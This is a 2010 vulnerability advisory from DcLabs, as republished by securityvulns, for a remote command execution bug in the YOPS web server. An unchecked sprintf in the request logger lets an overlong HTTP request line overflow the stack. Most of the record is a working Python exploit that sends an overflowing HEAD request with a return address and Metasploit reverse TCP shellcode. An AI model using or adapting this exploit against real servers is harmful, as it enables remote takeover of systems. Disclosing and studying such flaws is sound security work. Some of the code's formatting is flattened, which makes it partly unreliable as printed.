[DCA-00015] YOPS Web Server Remote Command Execution

2010-09-11T00:00:00
ID SECURITYVULNS:DOC:24699
Type securityvulns
Reporter Securityvulns
Modified 2010-09-11T00:00:00

Description

[DCA-00015]

[Software]

  • YOPS (Your Open Personal [WEB] Server)

[Vendor Product Description]

  • YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP server for Linux OS written in C. There are 7 stages (accept, parse, launch, fetch, error, send and log), and pipes are used as interstage channels.

[Bug Description]

  • In function http_parse_request_header the application fails to do a boundary check for a malformed buffer received as a HTTP command (HEAD/GET/POST), prior to use it as input for logger variable at swebs_record_log function.

--- http.c snippet --- int http_parse_request_header(char data, struct http_request_header h) { int r; int ver, rev; char s, tok, l, prm; [...] r = sscanf(h->http, " HTTP/%d.%d ", &ver, &rev); if (r != 2) return -400; [...] } --- END snippet ---

--- swebs.c snippet --- int swebs_record_log(int log, JOB *job) { int err; time_t now; char timestr[32]; char logrec[MAX_REQUEST_LINE_LEN + 1]; [...] sprintf ( logrec, "%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d", job->client, timestr, job->hdr.request_line, job->response_hlen, job->response_blen_sent, job->response_blen, job->status ); [...] } --- END snippet ---

[History]

  • Advisory sent to vendor on 08/26/2010

[Impact]

  • High (Remote Command Execution)

[Affected Version]

  • YOPS 2009-11-30

  • Prior versions may also be vulnerable

[Code]

!/usr/bin/python

Software:

YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP

server for Linux OS written in C.

URL: http://sourceforge.net/projects/yops2009/

Vulnerability: Rodrigo Escobar aka ipax @ DcLabs

Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs

Contact: waKKu <AT> dclabs <DOT> com <DOT> br

HOST = "localhost" PORT = 8888

import socket import sys import time

try: BUFF_LEN = int(sys.argv[1]) except: BUFF_LEN = 802 FIXUP_ADDR = "\x47\xce\x04\x08"

shellcode = (

MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444

"\x33\xc9\xb1\x13\xbe\xae\x88\x55\xcb\xda\xcd\xd9\x74\x24\xf4" "\x5f\x31\x77\x0e\x03\x77\x0e\x83\x69\x8c\xb7\x3e\x44\x56\xc0" "\x22\xf5\x2b\x7c\xcf\xfb\x22\x63\xbf\x9d\xf9\xe4\x9b\x3f\x6a" "\x9a\x1b\xbf\x6b\x02\x74\xae\x37\xac\xd7\xba\xd7\x61\x88\xb3" "\x39\xc2\x42\xa5\xe1\x08\x12\x70\x95\x4a\xa3\xbd\x54\xec\x8d" "\xb8\x9f\xbd\x65\x15\x4f\x4d\x1e\x01\xa0\xd3\xb7\xbf\x37\xf0" "\x18\x6c\xc1\x16\x28\x99\x1c\x58\x43" )

buffer = "HEAD " buffer += "A"BUFF_LEN buffer += FIXUP_ADDR4 buffer += " HTTP/1.1"

stackadjust = ( "\xcb" # instruction alignment "\xbc\x69\x69\x96\xb0" # Stack Adjustment )

payload = buffer + stackadjust + shellcode + "\r\n\r\n"

print """

DcLabs Security Research Group

+Exploit+

Software: YOPS 2009 - Web Server

Vulnerability by: ipax Exploit by: waKKu Greetings to: All DcLabs members """

print " [+] Using BUFF_LEN -> ", str(BUFF_LEN)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print " [+] Trying to establish connection..." s.connect((HOST, PORT)) print " [+] Sending a dummy request to initialize data..." s.send("HEAD DcLabs HTTP/1.1\r\n\r\n") try: s.recv(1024) except: pass s.close()

time.sleep(3)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) print " [+] Sending our malicious payload..." s.send(payload) print " [+] Payload sent, good luck!" s.close()

-- Rodrigo Escobar (ipax) Pentester/Researcher Security Team @ DcLabs http://www.dclabs.com.br